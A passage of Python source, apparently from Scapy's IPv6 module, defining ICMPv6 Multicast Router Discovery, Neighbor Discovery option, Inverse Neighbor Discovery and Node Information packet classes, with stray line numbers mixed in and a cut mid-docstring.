        return s[:split_at], s[split_at:]
1604
1605
class ICMPv6MRD_Solicitation(_ICMPv6):
    """Multicast Router Discovery Solicitation (ICMPv6 type 152)."""
    name = "ICMPv6 Multicast Router Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 152, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # The IPv6 Router Alert option is not added automatically: it
    # requires manual inclusion.
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}

    def extract_padding(self, s):
        """Split *s* after its first 4 bytes and return both parts."""
        split_at = 4
        return s[:split_at], s[split_at:]
1616
1617
class ICMPv6MRD_Termination(_ICMPv6):
    """Multicast Router Discovery Termination (ICMPv6 type 153)."""
    name = "ICMPv6 Multicast Router Discovery Termination"
    fields_desc = [
        ByteEnumField("type", 153, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # The IPv6 Router Alert option is not added automatically: it
    # requires manual inclusion.
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}

    def extract_padding(self, s):
        """Split *s* after its first 4 bytes and return both parts."""
        split_at = 4
        return s[:split_at], s[split_at:]
1628
1629
1630#                   ICMPv6 Neighbor Discovery (RFC 2461)                    #
1631
# Human-readable names of the Neighbor Discovery option types.
# Type 31 is listed so that every option type that has a dissector class
# in this module also has a display name.
icmp6ndopts = {1: "Source Link-Layer Address",
               2: "Target Link-Layer Address",
               3: "Prefix Information",
               4: "Redirected Header",
               5: "MTU",
               6: "NBMA Shortcut Limit Option",  # RFC2491
               7: "Advertisement Interval Option",
               8: "Home Agent Information Option",
               9: "Source Address List",
               10: "Target Address List",
               11: "CGA Option",            # RFC 3971
               12: "RSA Signature Option",  # RFC 3971
               13: "Timestamp Option",      # RFC 3971
               14: "Nonce option",          # RFC 3971
               15: "Trust Anchor Option",   # RFC 3971
               16: "Certificate Option",    # RFC 3971
               17: "IP Address Option",                             # RFC 4068
               18: "New Router Prefix Information Option",          # RFC 4068
               19: "Link-layer Address Option",                     # RFC 4068
               20: "Neighbor Advertisement Acknowledgement Option",
               21: "CARD Request Option",  # RFC 4065/4066/4067
               22: "CARD Reply Option",   # RFC 4065/4066/4067
               23: "MAP Option",          # RFC 4140
               24: "Route Information Option",  # RFC 4191
               25: "Recursive DNS Server Option",  # RFC 5006
               26: "IPv6 Router Advertisement Flags Option",  # RFC 5175
               31: "DNS Search List Option",  # RFC 6106
               }
1659
# Option type -> name of the class used to dissect that option.
# NOTE(review): values are class names (strings), presumably because the
# classes are defined later in this module -- check how callers resolve them.
icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
                  2: "ICMPv6NDOptDstLLAddr",
                  3: "ICMPv6NDOptPrefixInfo",
                  4: "ICMPv6NDOptRedirectedHdr",
                  5: "ICMPv6NDOptMTU",
                  6: "ICMPv6NDOptShortcutLimit",
                  7: "ICMPv6NDOptAdvInterval",
                  8: "ICMPv6NDOptHAInfo",
                  9: "ICMPv6NDOptSrcAddrList",
                  10: "ICMPv6NDOptTgtAddrList",
                  # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
                  # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
                  # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
                  # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
                  # 15: not implemented yet
                  # 16: not implemented yet
                  17: "ICMPv6NDOptIPAddr",
                  18: "ICMPv6NDOptNewRtrPrefix",
                  19: "ICMPv6NDOptLLA",
                  # 20: not implemented yet
                  # 21: not implemented yet
                  # 22: not implemented yet
                  23: "ICMPv6NDOptMAP",
                  24: "ICMPv6NDOptRouteInfo",
                  25: "ICMPv6NDOptRDNSS",
                  26: "ICMPv6NDOptEFA",
                  31: "ICMPv6NDOptDNSSL"
                  }
1690
# Names of the 2-bit router preference values; used by the 'prf' fields of
# ICMPv6ND_RA and ICMPv6NDOptRouteInfo.
icmp6ndraprefs = {0: "Medium (default)",
                  1: "High",
                  2: "Reserved",
                  3: "Low"}  # RFC 4191
1695
1696
1697class _ICMPv6NDGuessPayload:
1698    name = "Dummy ND class that implements guess_payload_class()"
1699
1700    def guess_payload_class(self, p):
1701        if len(p) > 1:
1702            return icmp6ndoptscls.get(orb(p[0]), Raw)  # s/Raw/ICMPv6NDOptUnknown/g ?  # noqa: E501
1703
1704
1705# Beginning of ICMPv6 Neighbor Discovery Options.
1706
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
    """Generic ND option: a type byte, a length byte and opaque data."""
    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
    fields_desc = [ByteField("type", None),
                   # When left to None, computed as len(data) + 2.
                   # NOTE(review): this counts bytes, whereas the other ND
                   # options in this file express 'len' in units of 8 bytes
                   # -- confirm this is intended.
                   FieldLenField("len", None, length_of="data", fmt="B",
                                 adjust=lambda pkt, x: x + 2),
                   # Dissected over 'len' - 2 bytes
                   StrLenField("data", "",
                               length_from=lambda pkt: pkt.len - 2)]
1714
# NOTE: len includes the type and len fields. It is expressed in units of
#       8 bytes.
# TODO: Revisit the use of ETHER_ANY as the default link-layer address
1717
1718
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
    """ND option type 1 carrying a MAC address in 'lladdr'."""
    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
    fields_desc = [
        ByteField("type", 1),
        ByteField("len", 1),
        MACField("lladdr", ETHER_ANY),
    ]

    def mysummary(self):
        """Return the option name followed by the link-layer address."""
        summary_fmt = "%name% %lladdr%"
        return self.sprintf(summary_fmt)
1727
1728
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
    """Reuses the fields of ICMPv6NDOptSrcLLAddr and sets the class
    attribute 'type' to 2 (the type icmp6ndoptscls maps to this class)."""
    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
    type = 2
1732
1733
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
    """ND option type 3: prefix, prefix length, L/A/R flags and lifetimes."""
    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
    fields_desc = [
        ByteField("type", 3),
        ByteField("len", 4),
        ByteField("prefixlen", 64),
        # One flag byte: L, A, R and five reserved bits
        BitField("L", 1, 1),
        BitField("A", 1, 1),
        BitField("R", 0, 1),
        BitField("res1", 0, 5),
        XIntField("validlifetime", 0xffffffff),
        XIntField("preferredlifetime", 0xffffffff),
        XIntField("res2", 0x00000000),
        IP6Field("prefix", "::"),
    ]

    def mysummary(self):
        """Return a one-line summary with the prefix and the three flags."""
        summary_fmt = ("%name% %prefix%/%prefixlen% "
                       "On-link %L% Autonomous Address %A% "
                       "Router Address %R%")
        return self.sprintf(summary_fmt)
1752
1753# TODO: We should also limit the size of included packet to something
1754# like (initiallen - 40 - 2)
1755
1756
class TruncPktLenField(PacketLenField):
    """PacketLenField whose built value is cut so that its length plus
    'cur_shift' is a multiple of 8 bytes."""
    __slots__ = ["cur_shift"]

    def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):  # noqa: E501
        """Store 'cur_shift'; the 'shift' argument is accepted but unused."""
        PacketLenField.__init__(self, name, default, cls, length_from=length_from)  # noqa: E501
        self.cur_shift = cur_shift

    def getfield(self, pkt, s):
        """Dissect length_from(pkt) bytes of *s*; return (rest, value)."""
        size = self.length_from(pkt)
        chunk, rest = s[:size], s[size:]
        return rest, self.m2i(pkt, chunk)

    def m2i(self, pkt, m):
        """Parse *m* with self.cls, or as a raw layer if that fails."""
        # It can happen we have sth shorter than 40 bytes
        try:
            return self.cls(m)
        except Exception:
            return conf.raw_layer(m)

    def i2m(self, pkt, x):
        """Return raw(x) without the trailing bytes that would break the
        8-byte alignment once 'cur_shift' is accounted for."""
        data = raw(x)
        excess = (len(data) + self.cur_shift) % 8
        return data[:len(data) - excess]

    def i2len(self, pkt, i):
        """Length of the (possibly truncated) built value."""
        built = self.i2m(pkt, i)
        return len(built)
1786
1787
# TODO: write a post_build to recompute the length (as a multiple of 8 bytes)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
    """ND option type 4: six reserved bytes followed by an IPv6 packet."""
    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
    fields_desc = [ByteField("type", 4),
                   # When left to None: (length of 'pkt' + 8) // 8, i.e. the
                   # 8 header bytes plus the packet, in units of 8 bytes
                   FieldLenField("len", None, length_of="pkt", fmt="B",
                                 adjust=lambda pkt, x:(x + 8) // 8),
                   StrFixedLenField("res", b"\x00" * 6, 6),
                   # Dissected over 8 * len - 8 bytes; cur_shift is 8
                   TruncPktLenField("pkt", b"", IPv6, 8,
                                    length_from=lambda pkt: 8 * pkt.len - 8)]
1797
1798# See which value should be used for default MTU instead of 1280
1799
1800
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
    """ND option type 5 carrying a 32-bit MTU (default 1280)."""
    name = "ICMPv6 Neighbor Discovery Option - MTU"
    fields_desc = [
        ByteField("type", 5),
        ByteField("len", 1),
        XShortField("res", 0),
        IntField("mtu", 1280),
    ]

    def mysummary(self):
        """Return the option name followed by the MTU value."""
        summary_fmt = "%name% %mtu%"
        return self.sprintf(summary_fmt)
1810
1811
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):  # RFC 2491
    """ND option type 6: a one-byte shortcut limit plus reserved bytes."""
    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
    fields_desc = [ByteField("type", 6),
                   ByteField("len", 1),
                   ByteField("shortcutlim", 40),  # XXX
                   ByteField("res1", 0),
                   IntField("res2", 0)]
1819
1820
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
    """ND option type 7 carrying a 32-bit advertisement interval."""
    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
    fields_desc = [
        ByteField("type", 7),
        ByteField("len", 1),
        ShortField("res", 0),
        IntField("advint", 0),
    ]

    def mysummary(self):
        """Return the option name and the interval, labelled milliseconds."""
        summary_fmt = "%name% %advint% milliseconds"
        return self.sprintf(summary_fmt)
1830
1831
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
    """ND option type 8 carrying a 16-bit preference and lifetime."""
    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
    fields_desc = [
        ByteField("type", 8),
        ByteField("len", 1),
        ShortField("res", 0),
        ShortField("pref", 0),
        ShortField("lifetime", 1),
    ]

    def mysummary(self):
        """Return the option name, the preference and the lifetime."""
        summary_fmt = "%name% %pref% %lifetime% seconds"
        return self.sprintf(summary_fmt)
1842
1843# type 9  : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1844
1845# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1846
1847
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """ND option type 17: an IPv6 address, its prefix length and an
    option code telling which address it is."""
    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
    fields_desc = [ByteField("type", 17),
                   ByteField("len", 3),
                   ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
                                                2: "New Care-Of Address",
                                                3: "NAR's IP address"}),
                   ByteField("plen", 64),
                   IntField("res", 0),
                   IP6Field("addr", "::")]
1858
1859
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """ND option type 18: an IPv6 prefix and its length."""
    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [ByteField("type", 18),
                   ByteField("len", 3),
                   ByteField("optcode", 0),
                   ByteField("plen", 64),
                   IntField("res", 0),
                   IP6Field("prefix", "::")]
1868
1869
# Names of the 'optcode' values of ICMPv6NDOptLLA (RFC 4068 LLA option)
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
                        1: "LLA for the new AP",
                        2: "LLA of the MN",
                        3: "LLA of the NAR",
                        4: "LLA of the src of TrSolPr or PrRtAdv msg",
                        5: "AP identified by LLA belongs to current iface of router",  # noqa: E501
                        6: "No preifx info available for AP identified by the LLA",  # noqa: E501
                        7: "No fast handovers support for AP identified by the LLA"}  # noqa: E501
1878
1879
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):     # RFC 4068
    """ND option type 19: an option code followed by a MAC address."""
    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [ByteField("type", 19),
                   ByteField("len", 1),
                   ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
                   MACField("lla", ETHER_ANY)]  # We only support ethernet
1886
1887
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):     # RFC 4140
    """ND option type 23: distance, preference, R flag, valid lifetime
    and an IPv6 address."""
    name = "ICMPv6 Neighbor Discovery - MAP Option"
    fields_desc = [ByteField("type", 23),
                   ByteField("len", 3),
                   # 'dist' and 'pref' share one byte (4 bits each)
                   BitField("dist", 1, 4),
                   BitField("pref", 15, 4),  # highest availability
                   # 'R' and 'res' share the next byte (1 + 7 bits)
                   BitField("R", 1, 1),
                   BitField("res", 0, 7),
                   IntField("validlifetime", 0xffffffff),
                   IP6Field("addr", "::")]
1898
1899
class _IP6PrefixField(IP6Field):
    """IPv6 prefix whose on-wire size is driven by the packet 'len' field.

    The field occupies 8 * (len - 1) bytes: nothing for len 0 or 1, the
    first 8 bytes of the address for len 2, the full 16 bytes for len 3.
    For larger values i2m() appends zero bytes after the address.
    """
    __slots__ = ["length_from"]

    def __init__(self, name, default):
        IP6Field.__init__(self, name, default)
        # Number of prefix bytes present on the wire for a given packet
        self.length_from = lambda pkt: 8 * (pkt.len - 1)

    def addfield(self, pkt, s, val):
        """Append the machine representation of *val* to *s*."""
        return s + self.i2m(pkt, val)

    def getfield(self, pkt, s):
        """Dissect the prefix from *s*; return (remaining bytes, address).

        The address is always handed to m2i() as exactly 16 bytes.
        """
        # A bogus 'len' of 0 would otherwise yield a negative slice bound
        tmp_len = max(self.length_from(pkt), 0)
        # Only the first 16 bytes are address bits: i2m() pads longer
        # options with zeros, so anything beyond that is skipped here.
        p = s[:tmp_len][:16]
        # Pad on the real byte count so that truncated input works too
        p += b'\x00' * (16 - len(p))
        return s[tmp_len:], self.m2i(pkt, p)

    def i2len(self, pkt, x):
        """Length in bytes of the built prefix."""
        return len(self.i2m(pkt, x))

    def i2m(self, pkt, x):
        """Build the prefix bytes according to the packet 'len' field.

        When 'len' is None the full 16-byte address is returned, unless
        *x* is None as well, in which case nothing is emitted.
        """
        tmp_len = pkt.len

        if x is None:
            x = "::"
            if tmp_len is None:
                tmp_len = 1
        x = inet_pton(socket.AF_INET6, x)

        if tmp_len is None:
            return x
        if tmp_len in [0, 1]:
            return b""
        if tmp_len in [2, 3]:
            return x[:8 * (tmp_len - 1)]

        # len > 3: full address followed by zero padding
        return x + b'\x00' * 8 * (tmp_len - 3)
1937
1938
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):  # RFC 4191
    """ND option type 24: a route prefix, its preference and lifetime."""
    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
    fields_desc = [
        ByteField("type", 24),
        # When left to None: length of the built prefix // 8, plus 1
        FieldLenField("len", None, length_of="prefix", fmt="B",
                      adjust=lambda pkt, x: x // 8 + 1),
        ByteField("plen", None),
        # One byte: 3 reserved bits, 2 preference bits, 3 reserved bits
        BitField("res1", 0, 3),
        BitEnumField("prf", 0, 2, icmp6ndraprefs),
        BitField("res2", 0, 3),
        IntField("rtlifetime", 0xffffffff),
        _IP6PrefixField("prefix", None),
    ]

    def mysummary(self):
        """Return the option name, prefix/length and preference."""
        summary_fmt = "%name% %prefix%/%plen% Preference %prf%"
        return self.sprintf(summary_fmt)
1953
1954
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):  # RFC 5006
    """ND option type 25: a lifetime and a list of DNS server addresses."""
    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
    fields_desc = [
        ByteField("type", 25),
        # When left to None: 2 * number of addresses + 1
        FieldLenField("len", None, count_of="dns", fmt="B",
                      adjust=lambda pkt, x: 2 * x + 1),
        ShortField("res", None),
        IntField("lifetime", 0xffffffff),
        # Dissected over 8 * (len - 1) bytes
        IP6ListField("dns", [],
                     length_from=lambda pkt: 8 * (pkt.len - 1)),
    ]

    def mysummary(self):
        """Return the option name followed by the comma-separated servers."""
        servers = ", ".join(self.dns)
        return self.sprintf("%name% " + servers)
1967
1968
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):  # RFC 5175 (prev. 5075)
    """ND option type 26: a single 48-bit 'res' field after type and len."""
    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
    fields_desc = [ByteField("type", 26),
                   ByteField("len", 1),
                   BitField("res", 0, 48)]
1974
1975# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
1976# described in section 3.1 of RFC 1035
1977# XXX Label should be at most 63 octets in length : we do not enforce it
1978#     Total length of domain should be 255 : we do not enforce it either
1979
1980
class DomainNameListField(StrLenField):
    """List of domain names in DNS wire format (length-prefixed labels).

    Internal value: a list of dotted names, each ending with ".".
    In padded mode the built value is zero-padded to a multiple of
    'padded_unit' bytes and empty names found while dissecting are dropped.
    """
    __slots__ = ["padded"]
    islist = 1
    padded_unit = 8

    def __init__(self, name, default, length_from=None, padded=False):  # noqa: E501
        self.padded = padded
        StrLenField.__init__(self, name, default, length_from=length_from)

    def i2len(self, pkt, x):
        """Length in bytes of the built list, padding included."""
        return len(self.i2m(pkt, x))

    def m2i(self, pkt, x):
        """Decode wire-format names into a list of dotted strings.

        Length octets are read from the raw bytes and each label is decoded
        on its own: decoding the whole buffer first would make character
        offsets drift from byte offsets as soon as a label is not ASCII.
        """
        res = []
        while x:
            # Get a name until \x00 is reached
            cur = []
            while x and orb(x[0]) != 0:
                tmp_len = orb(x[0])
                cur.append(plain_str(x[1:tmp_len + 1]))
                x = x[tmp_len + 1:]
            # In padded mode empty names are only padding: discard them
            if cur or not self.padded:
                res.append(".".join(cur) + ".")
            if x and orb(x[0]) == 0:
                x = x[1:]
        return res

    def i2m(self, pkt, x):
        """Encode a list of dotted names into DNS wire format."""
        def conditionalTrailingDot(z):
            # A name given with a trailing dot already ends with the empty
            # root label (\x00); otherwise terminate it explicitly
            if z and orb(z[-1]) == 0:
                return z
            return z + b'\x00'

        encoded = []
        for dom in x:
            # Encode first: the length octet counts bytes, not characters
            labels = [lab.encode("utf8") for lab in plain_str(dom).split('.')]
            wire = b"".join(chb(len(lab)) + lab for lab in labels)
            encoded.append(conditionalTrailingDot(wire))
        ret_string = b"".join(encoded)

        # In padded mode, add some \x00 bytes
        if self.padded and len(ret_string) % self.padded_unit:
            ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)  # noqa: E501

        return ret_string
2028
2029
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):  # RFC 6106
    """ND option type 31: a lifetime and a padded list of domain names."""
    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
    fields_desc = [
        ByteField("type", 31),
        # When left to None: 1 + length of the built search list // 8
        FieldLenField("len", None, length_of="searchlist", fmt="B",
                      adjust=lambda pkt, x: 1 + x // 8),
        ShortField("res", None),
        IntField("lifetime", 0xffffffff),
        # Dissected over 8 * len - 8 bytes
        DomainNameListField("searchlist", [],
                            length_from=lambda pkt: 8 * pkt.len - 8,
                            padded=True),
    ]

    def mysummary(self):
        """Return the option name followed by the comma-separated names."""
        domains = ", ".join(self.searchlist)
        return self.sprintf("%name% " + domains)
2044
2045# End of ICMPv6 Neighbor Discovery Options.
2046
2047
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
    """Router Solicitation (ICMPv6 type 133)."""
    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
    fields_desc = [ByteEnumField("type", 133, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("res", 0)]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
2055
2056
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
    """Router Advertisement (ICMPv6 type 134)."""
    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
    fields_desc = [
        ByteEnumField("type", 134, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ByteField("chlim", 0),
        # One flag byte: M, O, H, 2-bit preference, P, 2 reserved bits
        BitField("M", 0, 1),
        BitField("O", 0, 1),
        BitField("H", 0, 1),
        BitEnumField("prf", 1, 2, icmp6ndraprefs),  # RFC 4191
        BitField("P", 0, 1),
        BitField("res", 0, 2),
        ShortField("routerlifetime", 1800),
        IntField("reachabletime", 0),
        IntField("retranstimer", 0),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def answers(self, other):
        """An RA answers any Router Solicitation."""
        is_solicitation = isinstance(other, ICMPv6ND_RS)
        return is_solicitation

    def mysummary(self):
        """Return a one-line summary of lifetime, hop limit and flags."""
        summary_fmt = ("%name% Lifetime %routerlifetime% "
                       "Hop Limit %chlim% Preference %prf% "
                       "Managed %M% Other %O% Home %H%")
        return self.sprintf(summary_fmt)
2081
2082
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Neighbor Solicitation (ICMPv6 type 135) for the address 'tgt'."""
    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
    fields_desc = [
        ByteEnumField("type", 135, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
        IP6Field("tgt", "::"),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        """Return the layer name followed by the target address."""
        summary_fmt = "%name% (tgt: %tgt%)"
        return self.sprintf(summary_fmt)

    def hashret(self):
        """Return the encoded target address followed by the payload's
        own hashret() value."""
        target_key = bytes_encode(self.tgt)
        return target_key + self.payload.hashret()
2097
2098
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Neighbor Advertisement (ICMPv6 type 136) for the address 'tgt'."""
    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
    fields_desc = [
        ByteEnumField("type", 136, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        # 32 bits: R, S and O flags followed by 29 reserved bits
        BitField("R", 1, 1),
        BitField("S", 0, 1),
        BitField("O", 1, 1),
        XBitField("res", 0, 29),
        IP6Field("tgt", "::"),
    ]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        """Return the layer name followed by the target address."""
        summary_fmt = "%name% (tgt: %tgt%)"
        return self.sprintf(summary_fmt)

    def hashret(self):
        """Return the encoded target address followed by the payload's
        own hashret() value."""
        target_key = bytes_encode(self.tgt)
        return target_key + self.payload.hashret()

    def answers(self, other):
        """An NA answers a Neighbor Solicitation for the same target."""
        if not isinstance(other, ICMPv6ND_NS):
            return False
        return self.tgt == other.tgt
2119
2120# associated possible options : target link-layer option, Redirected header
2121
2122
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Redirect (ICMPv6 type 137) carrying a target and a destination
    address."""
    name = "ICMPv6 Neighbor Discovery - Redirect"
    fields_desc = [ByteEnumField("type", 137, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("res", 0),
                   IP6Field("tgt", "::"),
                   IP6Field("dst", "::")]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2132
2133
2134#                ICMPv6 Inverse Neighbor Discovery (RFC 3122)               #
2135
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
    """ND option type 9: six reserved bytes and a list of IPv6 addresses."""
    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
    fields_desc = [ByteField("type", 9),
                   # When left to None: 2 * number of addresses + 1
                   FieldLenField("len", None, count_of="addrlist", fmt="B",
                                 adjust=lambda pkt, x: 2 * x + 1),
                   StrFixedLenField("res", b"\x00" * 6, 6),
                   # Dissected over 8 * (len - 1) bytes
                   IP6ListField("addrlist", [],
                                length_from=lambda pkt: 8 * (pkt.len - 1))]
2144
2145
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    """Reuses the fields of ICMPv6NDOptSrcAddrList and sets the class
    attribute 'type' to 10 (the type icmp6ndoptscls maps to this class)."""
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
    type = 10
2149
2150
# RFC3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be nice to take the L2 address
#   requested in the required target lladdr option and use it as the
#   Ethernet destination address when no address is specified
# - That does not seem very practical if the user has to specify all
#   the options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    """Inverse Neighbor Discovery Solicitation (ICMPv6 type 141)."""
    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [ByteEnumField("type", 141, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("reserved", 0)]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2167
# Required options: target lladdr, target address list
# Other valid options: MTU
2170
2171
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """Inverse Neighbor Discovery Advertisement (ICMPv6 type 142)."""
    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [ByteEnumField("type", 142, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("reserved", 0)]
    # Defaults applied to an underlying IPv6 layer
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2179
2180
2181###############################################################################
2182# ICMPv6 Node Information Queries (RFC 4620)
2183###############################################################################
2184
2185# [ ] Add automatic destination address computation using computeNIGroupAddr
2186#     in IPv6 class (Scapy6 modification when integrated) if :
2187#     - it is not provided
2188#     - upper layer is ICMPv6NIQueryName() with a valid value
2189# [ ] Try to be liberal in what we accept as internal values for _explicit_
2190#     DNS elements provided by users. Any string should be considered
2191#     valid and kept like it has been provided. At the moment, i2repr() will
2192#     crash on many inputs
2193# [ ] Do the documentation
2194# [ ] Add regression tests
2195# [ ] Perform test against real machines (NOOP reply is proof of implementation).  # noqa: E501
2196# [ ] Check if there are differences between different stacks. Among *BSD,
2197#     with others.
2198# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
#     dnsrepr2names(). Should be deactivable.
2201
# Names of the Node Information query types (Qtype values)
icmp6_niqtypes = {0: "NOOP",
                  2: "Node Name",
                  3: "IPv6 Address",
                  4: "IPv4 Address"}
2206
2207
class _ICMPv6NIHashret:
    """Mixin providing hashret() based on the 'nonce' attribute."""

    def hashret(self):
        """Return the nonce passed through bytes_encode()."""
        nonce = self.nonce
        return bytes_encode(nonce)
2211
2212
2213class _ICMPv6NIAnswers:
2214    def answers(self, other):
2215        return self.nonce == other.nonce
2216
2217# Buggy; always returns the same value during a session
2218
2219
class NonceField(StrFixedLenField):
    """8-byte fixed-length string field used for nonces.

    When no default is supplied, the default becomes the object returned
    by a single randval() call made while the field is constructed.
    """
    def __init__(self, name, default=None):
        StrFixedLenField.__init__(self, name, default, 8)
        if default is None:
            # Evaluated once, when the field object is created
            self.default = self.randval()
2225
2226
@conf.commands.register
def computeNIGroupAddr(name):
    """Compute the NI group Address. Can take a FQDN as input parameter

    Only the first label of *name*, lowercased, is used. It is prefixed
    with its length, hashed with MD5, and the first four digest bytes
    become the last 32 bits of an address under ff02::2:0:0.

    :param name: host name or FQDN (str)
    :return: the group address as a string
    """
    name = name.lower().split(".")[0]
    record = chr(len(name)) + name
    h = md5(record.encode("utf8")).digest()
    # Zero-pad each byte: "%2x" pads with a space and yielded invalid
    # addresses such as "ff02::2: 5ab:..." for digest bytes below 0x10
    addr = "ff02::2:%02x%02x:%02x%02x" % struct.unpack("BBBB", h[:4])
    return addr
2236
2237
2238# Here is the deal. First, that protocol is a piece of shit. Then, we
2239# provide 4 classes for the different kinds of Requests (one for every
2240# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2241# data field class that is made to be smart by guessing the specific
2242# type of value provided :
2243#
2244# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2245#   if not overridden by user
2246# - IPv4 if acceptable for inet_pton(AF_INET,  ): code is set to 2,
2247#   if not overridden
2248# - Name in the other cases: code is set to 0, if not overridden by user
2249#
# Internal storage is not only the value, but a pair providing
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
2252#
2253# Note : I merged getfield() and m2i(). m2i() should not be called
2254#        directly anyway. Same remark for addfield() and i2m()
2255#
2256# -- arno
2257
2258# "The type of information present in the Data field of a query is
2259#  declared by the ICMP Code, whereas the type of information in a
2260#  Reply is determined by the Qtype"
2261
def names2dnsrepr(x):
    """
    Encode one DNS name, or a list of DNS names, in DNS wire format.

    A single bytes value ending with a null byte is assumed to be in
    wire format already and is returned untouched. Every other name is
    split on dots, each label is prefixed with its length and the name is
    terminated by a null byte (two for a single-label name). The encoded
    names are concatenated and returned as bytes.
